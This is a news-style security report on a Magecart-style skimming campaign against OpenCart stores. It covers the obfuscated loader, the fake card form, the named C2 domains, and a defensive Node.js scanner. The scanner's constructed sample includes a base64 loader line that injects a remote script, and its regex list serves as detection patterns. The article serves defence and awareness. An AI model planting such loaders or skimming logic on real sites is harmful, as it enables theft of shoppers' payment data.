- OpenCart websites were silently injected with malware that mimics trusted tracking scripts
- The script hides among analytics tags and silently swaps the real payment form for a fake one
- Obfuscated JavaScript let the attackers evade detection and steal card credentials in real time
A new Magecart-style attack has raised concerns across the cybersecurity landscape, targeting e-commerce websites that rely on the OpenCart CMS.
The attackers injected malicious JavaScript into landing pages, cleverly hiding it among legitimate user-analytics and marketing tags such as Facebook Pixel, Meta Pixel and Google Tag Manager.
Experts at c/side, a cybersecurity company that monitors third-party scripts and web assets to detect and prevent client-side attacks, say the injected code resembles a standard tag snippet, but its behavior tells a different story.
SCRIPT OBFUSCATION AND INJECTION TECHNIQUES
This particular campaign disguises its malicious intent by encoding the payload URL in base64 and routing traffic through suspicious domains such as //tagscart[.]shop/cdn/analytics.min.js, which makes detection in transit difficult.
At first glance it looks like a standard Google Analytics or Tag Manager script, but closer inspection reveals otherwise.
Once decoded and executed, the script dynamically creates a new script element, inserts it before the existing scripts and silently loads additional code.
The malware then runs heavily obfuscated code, using techniques such as hexadecimal string references, array recombination and eval() for dynamic decoding.
The script's key function is to inject a fake credit card form during checkout, designed to look legitimate.
Once rendered, the form captures the card number, expiration date and CVC entered by the user. Event listeners are attached to blur, key and paste events, ensuring that user input is captured at every stage.
Notably, the attack does not rely on clipboard scraping; users are made to enter the card details manually.
The data is then immediately exfiltrated via POST requests to two command-and-control (C2) domains: //ultrachart[.]shop/g.php and //hxjet[.]pics/g.php.
In a further twist, the original payment form is hidden once the card data has been submitted, and a second page then asks users to enter additional bank transaction details, compounding the threat.
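As an added defensive example (not code from the c/side report or from OpenCart), the following dependency-free Node.js scanner checks a saved copy of a checkout page for the two traits described above: script tags loaded from hosts outside the shop's allowlist, and inline scripts that combine base64 decoding, eval() or hex-escaped strings with dynamic script-element creation. The allowlist, the sample HTML and the example-shop.test / example.invalid hosts are constructed assumptions.

```javascript
// Added example (not c/side's or OpenCart's code): scan page HTML for (1) <script src>
// hosts outside an allowlist and (2) inline second-stage loaders built from base64/eval/hex tricks.
// Hypothetical allowlist: the shop's own host plus the tag vendors it really uses.
const ALLOWED_SCRIPT_HOSTS = new Set([
  "example-shop.test", // constructed first-party host
  "www.googletagmanager.com",
  "connect.facebook.net",
]);
const INLINE_LOADER_PATTERNS = [
  /\batob\s*\(/,                              // base64-decoded payload URL
  /\beval\s*\(/,                              // eval()-based dynamic decoding
  /\\x[0-9a-f]{2}/i,                          // hex-escaped string literals
  /createElement\s*\(\s*["']script["']\s*\)/, // dynamic script element
];
function scanHtmlForSkimmerTraits(html) {
  const findings = [];
  const scriptRe = /<script\b([^>]*)>([\s\S]*?)<\/script>/gi;
  let m;
  while ((m = scriptRe.exec(html)) !== null) {
    const [, attrs, body] = m;
    const src = /\bsrc\s*=\s*["']([^"']+)["']/i.exec(attrs);
    if (src) {
      let host = null;
      try {
        // Protocol-relative "//host/path" resolves against the (constructed) page origin.
        host = new URL(src[1], "https://example-shop.test/").hostname;
      } catch { /* unparsable URL is treated as an unknown host */ }
      if (!host || !ALLOWED_SCRIPT_HOSTS.has(host)) {
        findings.push({ kind: "unlisted-script-host", detail: src[1] });
      }
    } else {
      // Require two independent traits so ordinary inline tag snippets stay quiet.
      const hits = INLINE_LOADER_PATTERNS.filter((re) => re.test(body)).length;
      if (hits >= 2) {
        findings.push({ kind: "obfuscated-inline-loader", detail: body.trim().slice(0, 60) });
      }
    }
  }
  return findings;
}
// Constructed sample: one legitimate tag, one unlisted CDN, one base64 loader, one benign inline.
const SAMPLE_CHECKOUT_HTML = `
<script src="https://www.googletagmanager.com/gtm.js?id=GTM-XXXX"></script>
<script src="//cdn.example.invalid/analytics.min.js"></script>
<script>var u=atob('Ly9leGFtcGxlLmludmFsaWQvYS5qcw==');var s=document.createElement('script');s.src=u;document.head.insertBefore(s,document.head.firstChild);</script>
<script>window.dataLayer=window.dataLayer||[];</script>
`;
console.log(JSON.stringify(scanHtmlForSkimmerTraits(SAMPLE_CHECKOUT_HTML), null, 2));
```

The sample yields two findings, the unlisted CDN host and the atob()-plus-createElement loader, while the Google Tag Manager and dataLayer snippets pass; point it at a real saved checkout page by replacing the constructed allowlist and HTML.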
What stands out in this case is the unusually long delay before the stolen card data was used: several months rather than the typical few days.
The report reveals that one card was used on June 18 in a phone payment transaction in the USA, while another was charged €47.80 by an unidentified provider.
This breach highlights a growing risk in SaaS-based e-commerce, where CMS platforms such as OpenCart become soft targets for advanced malware.
There is therefore a need for stronger security measures beyond basic firewalls.
Automated platforms such as c/side claim to detect such threats by spotting obfuscated JavaScript, unauthorized injections and anomalous script behavior.
As attackers evolve, even small CMS deployments must remain vigilant, and real-time monitoring and threat intelligence should no longer be optional for e-commerce vendors seeking to retain their customers' trust.